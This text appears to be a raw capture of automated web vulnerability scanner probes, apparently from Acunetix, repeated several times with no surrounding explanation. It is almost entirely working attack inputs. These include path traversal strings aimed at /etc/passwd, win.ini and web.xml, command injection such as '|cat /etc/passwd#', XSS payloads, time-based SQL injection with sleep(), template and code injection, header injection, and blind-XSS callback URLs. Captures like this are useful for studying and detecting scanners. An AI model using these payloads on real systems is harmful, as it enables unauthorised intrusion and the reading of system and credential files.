1

1

-1

1<iframe src='data:text/html

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

-1)

1<body onload=prompt(960284)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

${99183+99381}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952427)>

|cat /etc/passwd#

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n907681=v954761

)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

j0apDBi0'

'|'ld

1

1<img src=xyz OnErRor=prompt(978473)>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

wjDLc8Xg')

1<img/src=">" onerror=alert(959250)>

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

9Ipb9LPI'))

/etc/passwd

^(#$!@#$)(()))******

1

1

'

'"()

1<ScRiPt%20>prompt(996250)</sCripT>

testasp.vulnweb.com

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1&lt

1

"

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1)

1

\xf6<img acu onmouseover=prompt(905729) //\xf6>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<input autofocus onfocus=prompt(922020)>

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://hit1Fd41z48TU.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

1

blUxvLx2'

1

||cat /etc/passwd

1

1

acunetix_wvs_invalid_filename

file:///etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

&dir

1

GQUPRfws')

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

comments

/\../\../\../\../\../\../\../etc/passwd

http://www.acunetix.tst

1_gVMnN <ScRiPt >prompt(914883)</ScRiPt>

Nz3sc9ld'))

1

1

1

1

"&dir&"

1

1

WEB-INF/web.xml

comments

1

|dir

1

1'"()&%<ScRiPt >prompt(903223)</ScRiPt>

'"

1

1

1

comments/.

WEB-INF\web.xml

'|dir

1

'"()&%<ScRiPt >prompt(998641)</ScRiPt>

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1_952561

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acu6154\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6154

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux1484\xc0\xbez1\xc0\xbcz2a\x90bcxuca1484

................windowswin.ini

1

1

1

1<ScRiPt >prompt(910772)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(980010)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(915079)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979346></ScRiPt>

1

1

1

1

1<ScRiPt >prompt(958386)</ScRiPt>

WEB-INF/web.xml

1

response.write(9245682*9860030)

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(924405)">

1

1

'+response.write(9245682*9860030)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994242)"></g></svg>

1

&cat /etc/passwd&

1

1

"+response.write(9245682*9860030)+"

1

1

1<div style=width:expression(prompt(921449))>

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

"&cat /etc/passwd&"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1<body onload=prompt(961373)>

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

${99986+100061}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(924003)>

1

`cat /etc/passwd`

1&n981550=v990012

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=xyz OnErRor=prompt(919806)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

|cat /etc/passwd#

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(981948)>

1

)

1

testasp.vulnweb.com

3KAErJz4'

1

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(954949)</sCripT>

Ap1NAw4s')

/etc/passwd

"|"ld

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1&lt

bTZz3WL2'))

^(#$!@#$)(()))******

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

\xf6<img acu onmouseover=prompt(945416) //\xf6>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

-1

1

1

1

1<input autofocus onfocus=prompt(996219)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hitkWOJte6y7G.bxss.me/

1

-1)

"

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1))

1

1

file:///etc/passwd

1

comments

1

&dir

1_R9FGa <ScRiPt >prompt(954086)</ScRiPt>

1

comments/.

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

2jIfg92Y'

'"

http://www.acunetix.tst

1

1

'&dir&'

1

1

A68sQEt0')

<!--

1

WEB-INF/web.xml

1

1

"&dir&"

1

1

1

l0Y6DGAK'))

|dir

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(906399)</ScRiPt>

1

1

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(968587)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

../../../../../../../../../../boot.ini

1

1_983435

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acu4544\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4544

1

1

1

................windowswin.ini

acux8349\xc0\xbez1\xc0\xbcz2a\x90bcxuca8349

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(903278)</ScRiPt>

1

1

1

1<script>prompt(905681)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(965269)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950606></ScRiPt>

1

1

1<ScRiPt >prompt(918349)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(982061)">

&cat /etc/passwd&

1

response.write(9342377*9602493)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906095)"></g></svg>

WEB-INF\web.xml

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9342377*9602493)+'

1

"&cat /etc/passwd&"

1

1<div style=width:expression(prompt(956983))>

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

"+response.write(9342377*9602493)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(963637)>

1

${99507+99626}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

'|'ld

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952523)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

1

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n989109=v994201

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=xyz OnErRor=prompt(925197)>

1

-1))

1

1some_inexistent_file_with_long_name%00.jpg

)

1

1<img/src=">" onerror=alert(931035)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

399rGhCS'

1

!(()&&!|*|*|

'"()

'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

/etc/passwd

4977rinG')

1

1<ScRiPt%20>prompt(913230)</sCripT>

1

^(#$!@#$)(()))******

testasp.vulnweb.com

"

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

iiXT4sFr'))

1

1

1&lt

1

${@print(md5(acunetix_wvs_security_test))}

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

\xf6<img acu onmouseover=prompt(930487) //\xf6>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

-1))

1<input autofocus onfocus=prompt(945269)>

1

1

'&dir&'

4hdDJQIu'

1

acunetix_wvs_invalid_filename

http://hitJ5f0x9CkhM.bxss.me/

1

"&dir&"

1

<a href='http://www.acunetix.com'>website security</a>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Jl51NTTs')

1

file:///etc/passwd

1

comments

|dir

WHHEFXDd'))

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

1

'|dir

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1_bb4wQ <ScRiPt >prompt(938318)</ScRiPt>

1'"()&%<ScRiPt >prompt(977186)</ScRiPt>

'"

comments/.

1

1

1

WEB-INF/web.xml

"|dir

1

1

<!--

1

'"()&%<ScRiPt >prompt(975807)</ScRiPt>

1

1

WEB-INF\web.xml

1

1_923772

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu4433\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4433

1

../../../../../../../../../../boot.ini

1

1

acux1083\xc0\xbez1\xc0\xbcz2a\x90bcxuca1083

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<ScRiPt >prompt(996302)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(992536)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(917480)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976223></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(951206)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(968919)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964021)"></g></svg>

response.write(9001720*9656800)

1

1

1

WEB-INF/web.xml

1<div style=width:expression(prompt(967564))>

'+response.write(9001720*9656800)+'

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

"+response.write(9001720*9656800)+"

1

1

'&cat /etc/passwd&'

1<body onload=prompt(994869)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938612)>

"&cat /etc/passwd&"

1

1

-1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(975207)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

-1))

${99448+99824}

`cat /etc/passwd`

1

1

1<img/src=">" onerror=alert(950864)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

hTMacJ8n'

1

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

)

1&n994300=v964514

1<ScRiPt%20>prompt(956415)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

m53k9WqU')

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&lt

1

'"()

^(#$!@#$)(()))******

testasp.vulnweb.com

"|"ld

8CfCouQ2'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

\xf6<img acu onmouseover=prompt(986335) //\xf6>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

/etc/passwd

1

1

'

1

1

1

1<input autofocus onfocus=prompt(971698)>

-1)

"

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitLUvADkwz2I.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

1

pDthzgS2'

1

[url=http://www.acunetix.com]website security[/url]

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

http://www.acunetix.tst

MZGvm73C')

1

1

1_H5RiM <ScRiPt >prompt(945686)</ScRiPt>

comments

1

1

&dir

1

1

LE9jRWb8'))

1

'"

comments/.

1'"()&%<ScRiPt >prompt(922158)</ScRiPt>

1

'&dir&'

file:///etc/passwd

1

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(981161)</ScRiPt>

"&dir&"

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_957629

|dir

1

1

1

1

1

acu6037\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6037

'|dir

WEB-INF/web.xml

1

1

1

"|dir

acux7784\xc0\xbez1\xc0\xbcz2a\x90bcxuca7784

1

WEB-INF\web.xml

1

1

1

1<ScRiPt >prompt(978686)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1<script>prompt(955054)</script>

1

1

1

1

1<ScRiPt >prompt(922846)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936730></ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(974004)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(922793)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(993807)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9056005*9790362)

1

1

1<div style=width:expression(prompt(999428))>

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9056005*9790362)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

"+response.write(9056005*9790362)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(996094)>

"&cat /etc/passwd&"

WEB-INF/web.xml

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

cat /etc/passwd

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911230)>

1

1

1

../../../../../../../../../../etc/passwd

-1

1

1

1

1<img src=xyz OnErRor=prompt(979611)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${100191+99708}

1

-1))

1

1

1<img/src=">" onerror=alert(978261)>

|cat /etc/passwd#

A4wIpeas'

1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n915704=v960479

'|'ld

1

1

1<ScRiPt%20>prompt(939917)</sCripT>

YBCgfmjv')

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

szH5zBpC'))

1

1&lt

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(989642) //\xf6>

1

^(#$!@#$)(()))******

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

'

1<input autofocus onfocus=prompt(999809)>

1

1

-1))

1

1

1

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

1

Z1hWLhxp'

1

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

http://hitWczTCKmh2W.bxss.me/

VSj5tQZs')

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1_b94Gy <ScRiPt >prompt(908476)</ScRiPt>

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

6VN0wCyq'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'&dir&'

1

comments

1

1

1

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

"&dir&"

1

1

1

comments/.

1

|dir

<!--

1

1

1'"()&%<ScRiPt >prompt(989116)</ScRiPt>

1

1

1

'|dir

'"()&%<ScRiPt >prompt(981637)</ScRiPt>

file:///etc/passwd

1

1

"|dir

1

1

1

1

1

1_996557

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

WEB-INF/web.xml

acu5527\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5527

1

1

WEB-INF\web.xml

1

1

1

1

acux5950\xc0\xbez1\xc0\xbcz2a\x90bcxuca5950

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(946177)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(930730)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(905747)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957568></ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(928907)</ScRiPt>

1

response.write(9839515*9912905)

1

1

1<video><source onerror="javascript:prompt(973806)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9839515*9912905)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973798)"></g></svg>

1

&cat /etc/passwd&

1

1

1<div style=width:expression(prompt(937101))>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9839515*9912905)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1<body onload=prompt(927050)>

1

1

1

WEB-INF/web.xml

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(900775)>

1

-1)

1

WEB-INF\web.xml

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img src=xyz OnErRor=prompt(973096)>

${99673+99860}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

-1))

1

1

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(956461)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

0oDooSxp'

)

1&n988834=v920437

'|'ld

1

1<ScRiPt%20>prompt(951263)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

ARIVK6hK')

"|"ld

1

1

!(()&&!|*|*|

'

1&lt

eQvVUhU7'))

testasp.vulnweb.com

'"()

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

\xf6<img acu onmouseover=prompt(929413) //\xf6>

"

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(926175)>

1

1

1

1

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

http://hitCyaEFoctjz.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

JDll39A1'

1

||cat /etc/passwd

1

comments

vxVg73D1')

1

[url=http://www.acunetix.com]website security[/url]

1

1

comments

&dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

89KNPsm3'))

comments/.

1_l8i9L <ScRiPt >prompt(968211)</ScRiPt>

file:///etc/passwd

http://www.acunetix.tst

1

1

1

1

1

'&dir&'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'"

1

"&dir&"

1'"()&%<ScRiPt >prompt(917971)</ScRiPt>

1

1

<!--

1

1

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(921560)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

1

1

1_936883

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

acu2390\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2390

../../../../../../../../../../boot.ini

1

1

1

acux6757\xc0\xbez1\xc0\xbcz2a\x90bcxuca6757

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(920786)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1<script>prompt(933426)</script>

1

1

1<ScRiPt >prompt(985230)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997242></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948492)</ScRiPt>

1

1

response.write(9720025*9664803)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(989653)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9720025*9664803)+'

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(901432)"></g></svg>

1

"+response.write(9720025*9664803)+"

&cat /etc/passwd&

1

WEB-INF/web.xml

1<div style=width:expression(prompt(928937))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

